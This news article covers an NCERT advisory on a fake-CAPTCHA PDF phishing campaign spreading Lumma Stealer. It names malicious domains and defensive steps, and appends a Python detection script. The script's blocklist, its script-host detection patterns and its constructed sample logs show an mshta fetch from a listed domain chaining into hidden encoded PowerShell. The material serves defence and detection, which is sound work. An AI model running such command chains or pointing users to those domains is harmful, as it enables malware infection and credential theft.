NCERT warns of fake CAPTCHA, PDF scam spreading malware

To protect against the fake CAPTCHA and PDF scam, NCERT advises organisations to educate employees about phishing, block the malicious domains, and deploy advanced security tools
An undated image. — Canva

The National Computer Emergency Response Team (NCERT) has issued a warning about a new phishing campaign that uses fake CAPTCHA images embedded in PDF files to spread the Lumma Stealer malware.

The cyberattack has affected thousands of users across the technology, finance, and manufacturing sectors in North America, Asia, and Southern Europe.

How do hackers use fake CAPTCHAs to attack user data?

Hackers are using search engine manipulation (SEO poisoning) to distribute these malicious PDF files, which surface in search results after being uploaded to document-hosting platforms such as PDFCOFFEE, PDF4PRO, and the Internet Archive. The platforms themselves are legitimate; it is the uploaded PDFs that carry the lure.

When users open these files, they see a fake CAPTCHA image prompting them to click a link. The link redirects them to a phishing website, where the criminals either harvest financial data or run PowerShell scripts that install the malware. A genuine CAPTCHA never asks the user to follow a link out of a document, so this prompt alone is a warning sign.

What is Lumma Stealer malware?

Lumma Stealer is a Malware-as-a-Service (MaaS) tool designed to steal login credentials, browser cookies, and cryptocurrency wallet information. It also installs GhostSocks, a proxy malware that lets the attackers route their own traffic through the victim's internet connection.

The stolen data is later sold on dark web forums such as Leaky[.]pro. Malicious domains linked to this attack include pdf-freefiles[.]com, webflow-docs[.]info, secure-pdfread[.]site, and docsviewing[.]net.

How to protect against this threat?

To protect against this threat, NCERT advises organisations to educate employees about phishing, block the malicious domains listed above, and deploy advanced security tools.

Restricting PowerShell and MSHTA execution (for example through application control policies for users who have no need of those script hosts), enabling multi-factor authentication (MFA), and monitoring search engine results for fake websites are also recommended.
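The advisory's recommendations can be turned into a concrete detection check. The script below is an added example written for this page, not NCERT's own tooling: it refangs the domains named above into a blocklist, then scans constructed DNS-query and Sysmon-style process-creation log lines for (a) lookups of those domains or their subdomains and (b) mshta.exe or PowerShell being launched by a browser, PDF reader or mshta itself, or carrying a URL or encoded command. The log format, timestamps, file paths and the list of parent processes are assumptions made for the example.

```python
"""Detection helper for the fake-CAPTCHA PDF lure (added example, not NCERT code).

Checks two things over a log stream:
  1. DNS lines that query an IOC domain from the advisory (or a subdomain of one).
  2. Process-creation lines where a script host (mshta.exe / powershell.exe)
     is spawned by a browser, PDF reader or mshta, or has a URL or an
     encoded command on its command line.
All sample log lines below are constructed for the example, not real telemetry.
"""
import re
from dataclasses import dataclass

# IOC domains as published, in defanged "[.]" form.
IOC_DOMAINS_DEFANGED = [
    "pdf-freefiles[.]com",
    "webflow-docs[.]info",
    "secure-pdfread[.]site",
    "docsviewing[.]net",
]


def refang(domain: str) -> str:
    """Turn 'example[.]com' back into 'example.com' (lower-cased)."""
    return domain.replace("[.]", ".").lower()


IOC_DOMAINS = {refang(d) for d in IOC_DOMAINS_DEFANGED}

# Assumed parent processes that should never need to launch a script host:
# the PDF reader or browser the lure was opened in, plus mshta chaining into
# PowerShell. Hosting platforms such as pdfcoffee.com are NOT blocked.
SUSPICIOUS_PARENTS = {"acrord32.exe", "acrobat.exe", "sumatrapdf.exe",
                      "chrome.exe", "msedge.exe", "firefox.exe", "mshta.exe"}
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "pwsh.exe"}

# Assumed key=value log format; quoted values may contain spaces.
FIELD_RE = re.compile(r'(\w+)=("([^"]*)"|\S+)')
URL_RE = re.compile(r"https?://", re.I)
URL_HOST_RE = re.compile(r"https?://([^/\s\"']+)", re.I)
ENCODED_RE = re.compile(r"-(enc|encodedcommand|e)\b", re.I)


@dataclass
class Finding:
    line_no: int
    reason: str


def matches_ioc(host: str) -> bool:
    """True if host is an IOC domain or a subdomain of one (not a substring)."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in IOC_DOMAINS)


def parse_kv(line: str) -> dict:
    """Extract key=value pairs, stripping quotes from quoted values."""
    out = {}
    for m in FIELD_RE.finditer(line):
        out[m.group(1)] = m.group(3) if m.group(3) is not None else m.group(2)
    return out


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def check_process(fields: dict):
    """Return a reason string if a script-host launch looks like the lure, else None."""
    image = basename(fields.get("Image", ""))
    if image not in SCRIPT_HOSTS:
        return None
    parent = basename(fields.get("ParentImage", ""))
    cmd = fields.get("CommandLine", "")
    reasons = []
    if parent in SUSPICIOUS_PARENTS:
        reasons.append(f"{image} spawned by {parent}")
    if URL_RE.search(cmd):
        reasons.append("URL on command line")
    if ENCODED_RE.search(cmd):
        reasons.append("encoded PowerShell command")
    for host in URL_HOST_RE.findall(cmd):
        if matches_ioc(host):
            reasons.append(f"IOC domain {host}")
    return "; ".join(reasons) if reasons else None


def scan(log_text: str) -> list:
    """Run both checks over every line; return Findings with 1-based line numbers."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        fields = parse_kv(line)
        if " dns " in line:
            qname = fields.get("qname", "")
            if matches_ioc(qname):
                findings.append(Finding(n, f"DNS query for IOC domain {qname}"))
        elif " proc " in line:
            reason = check_process(fields)
            if reason:
                findings.append(Finding(n, reason))
    return findings


# Constructed sample: a user opens the lure PDF, clicks the fake CAPTCHA link,
# mshta fetches a page from an IOC domain and chains into encoded PowerShell.
# The last line is a benign scheduled PowerShell job that must not be flagged.
SAMPLE_LOG = "\n".join([
    r'2025-03-05T10:11:58Z dns qname=www.pdfcoffee.com type=A',
    r'2025-03-05T10:12:01Z dns qname=cdn.secure-pdfread.site type=A',
    r'2025-03-05T10:12:03Z proc Image="C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" CommandLine="Acrobat.exe lure.pdf" ParentImage="C:\Windows\explorer.exe"',
    r'2025-03-05T10:12:07Z proc Image="C:\Windows\System32\mshta.exe" CommandLine="mshta.exe https://docsviewing.net/captcha.hta" ParentImage="C:\Program Files\Google\Chrome\Application\chrome.exe"',
    r'2025-03-05T10:12:09Z proc Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" CommandLine="powershell.exe -w hidden -enc SQBFAFgA" ParentImage="C:\Windows\System32\mshta.exe"',
    r'2025-03-05T10:13:00Z proc Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" CommandLine="powershell.exe -File C:\scripts\backup.ps1" ParentImage="C:\Windows\System32\svchost.exe"',
])

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.reason}")
```

The domain match deliberately requires a label boundary, so a look-alike such as notsecure-pdfread.site does not trip the blocklist while cdn.secure-pdfread.site does; the process check fires on the parent-child relationship and the command line, so it still catches the chain when the attacker rotates to a domain that is not yet on the list.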